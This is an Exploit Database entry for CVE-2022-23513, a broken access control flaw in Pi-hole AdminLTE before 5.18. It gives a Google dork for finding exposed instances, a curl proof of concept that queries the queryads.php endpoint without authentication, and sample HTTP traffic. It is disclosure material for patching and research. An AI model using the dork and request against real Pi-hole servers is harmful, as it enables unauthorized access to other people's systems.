AdminLTE PiHole 5.18 – Broken Access Control

• Exploit Database
• 21 阅读

• 作者： kv1to
  日期： 2023-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51705/

• # Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
  # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
  # Date: 21.12.2022
  # Exploit Author: kv1to
  # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
  # Tested on: Raspbian / Debian
  # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
  # CVE : CVE-2022-23513
  
  In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
  
  ## Proof Of Concept with curl:
  curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
  
  ## HTTP requests
  GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
  HOST: pi.hole
  Cookie: [..SNIPPED..]
  [..SNIPPED..]
  
  ## HTTP Response
  HTTP/1.1 200 OK
  [..SNIPPED..]
  
  data: Match found in [..SNIPPED..]
  data: <domain>
  data: <domain>
  data: <domain>